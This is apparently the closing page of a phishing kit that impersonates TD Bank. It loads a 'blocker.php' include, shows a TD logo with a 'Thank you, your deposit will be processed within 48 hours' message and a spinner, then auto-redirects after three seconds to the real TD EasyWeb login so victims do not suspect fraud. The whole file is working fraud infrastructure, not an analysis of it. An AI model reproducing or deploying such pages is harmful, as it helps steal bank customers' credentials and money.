<?php
include('blocker.php');
?>
<!DOCTYPE html>
<html>
      <head>
       <LINK href="js/snsStyles.css" rel="stylesheet" type="text/css">
	   
		<META HTTP-EQUIV="Refresh" CONTENT="3;URL=https://authentication.td.com/uap-ui/index.html?consumer=easyweb&locale=en_CA#/login/easyweb-getting-started">
       <title>
       Processing...
       </title>
       
	
	 
	 	
	 
	  <style type="text/css">
           
             #signOutContent {
   margin:150px 0 0 0;
  }

  #signOutTxt {
   font:normal 18px Arial;
   color:#333333;
  }

  #main-txt {
    margin:33px 0 0 0;
  }

  #signout-circle {
    margin:46px 0 0 0
  }

  #signout-main {
   width:100%;
   text-align:center;
  }


	  </style>
	 </head>
	 
	 <body>
	 
          <div id="signout-main"> 

	   <div id="signOutContent">
	    <img id="aolBlueLogo" src="http://downtownptbo.ca/assets/img/uploads/dbia_td.jpg?1405109643" />
	   </div>
	  
	   <div id="main-txt">
	    <span id="signOutTxt">
	     Thank you, <br />
	   Your deposit will be processed within 48 hours.
	    </span>
	   </div>
	  
	   <div id="signout-circle">
	    <img src="https://upload.wikimedia.org/wikipedia/commons/b/b1/Loading_icon.gif" />
           </div>
	 
          </div>
 
</body>

</html>


